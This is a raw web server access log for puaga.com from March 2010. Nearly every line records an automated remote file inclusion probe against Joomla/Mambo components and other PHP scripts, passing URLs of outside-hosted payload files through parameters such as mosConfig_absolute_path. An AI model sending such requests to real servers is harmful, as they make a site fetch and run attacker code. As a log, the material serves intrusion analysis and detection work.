87.106.151.69 - - [04/Mar/2010:09:53:07 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:07 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:18 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:26 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:26 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:26 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:53:30 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "puaga.com"
200.93.147.154 - - [04/Mar/2010:09:53:30 -0800] "GET /module//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 1389 "-" "Mozilla/5.0" "puaga.com"
200.93.147.154 - - [04/Mar/2010:09:53:30 -0800] "GET /module/setup.php%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
87.106.151.69 - - [04/Mar/2010:09:53:31 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:53:48 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:53:48 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:53:49 -0800] "GET /delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:53:52 -0800] "GET /delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:53:53 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:53:53 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:09:54:03 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:09:54:03 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:09:54:03 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:54:05 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:54:05 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:54:05 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:54:30 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:54:30 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:54:30 -0800] "GET /logs/access_100130.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:54:42 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:00 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:01 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:01 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:01 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:55:09 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:55:30 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:55:30 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:55:30 -0800] "GET /logs/access_100126.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:55:33 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:55:33 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:55:33 -0800] "GET /logs/access_100130.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:55:33 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [04/Mar/2010:09:55:40 -0800] "GET /logs/access_100215.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [04/Mar/2010:09:55:41 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:55:42 -0800] "GET /module//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 1389 "-" "Mozilla/5.0" "puaga.com"
200.93.147.154 - - [04/Mar/2010:09:55:42 -0800] "GET /module/setup.php%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
110.45.145.178 - - [04/Mar/2010:09:55:42 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:55:45 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:51 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:51 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:51 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:55:51 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:56:00 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "puaga.com"
200.93.147.154 - - [04/Mar/2010:09:56:00 -0800] "GET /module//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 200 1389 "-" "Mozilla/5.0" "puaga.com"
200.93.147.154 - - [04/Mar/2010:09:56:00 -0800] "GET /module/setup.php%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/pir1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [04/Mar/2010:09:56:31 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:56:31 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:56:31 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:56:37 -0800] "GET /logs/access_100130.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:56:59 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:56:59 -0800] "GET /logs/access_100126.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:57:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:57:04 -0800] "GET /logs/access_100130.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:57:06 -0800] "GET /logs/access_100214.log//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:57:08 -0800] "GET /logs/access_100225.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:57:08 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:57:15 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [04/Mar/2010:09:57:29 -0800] "GET /logs/access_100205.log//error.php?dir=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:58:08 -0800] "GET /logs/access_100203.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:58:08 -0800] "GET /logs/access_100209.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:58:26 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:58:26 -0800] "GET /logs/access_100220.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:58:26 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:59:13 -0800] "GET /logs/access_100221.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:59:18 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:59:18 -0800] "GET /delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:59:18 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:09:59:22 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:59:26 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:59:26 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:59:27 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:00:15 -0800] "GET /delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:00:15 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:00:16 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:00:21 -0800] "GET /logs/access_100221.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:01:08 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:01:29 -0800] "GET /logs/access_100130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:01:30 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:01:31 -0800] "GET /logs/access_100130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:01:31 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:01:49 -0800] "GET /logs/access_100130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:01:49 -0800] "GET /logs/access_100126.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:10 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:10 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:10 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:13 -0800] "GET /logs/access_100225.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:02:24 -0800] "GET /logs/access_100130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:44 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:44 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:44 -0800] "GET /logs/access_100217.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:02:44 -0800] "GET /logs/access_100225.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:03:36 -0800] "GET /logs/access_100226.log%20%20//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:10:03:49 -0800] "GET /logs/access_100303.log HTTP/1.0" 200 1409930 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:09 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:22 -0800] "GET /logs/access_100225.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:22 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:22 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:24 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:24 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:04:24 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:10:04:25 -0800] "GET /logs/access_100206.log/?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:04:25 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:04:27 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:04:27 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:10:05:01 -0800] "GET /logs/access_100218.log/?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:05:09 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:05:09 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [04/Mar/2010:10:05:09 -0800] "GET /logs/access_100217.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
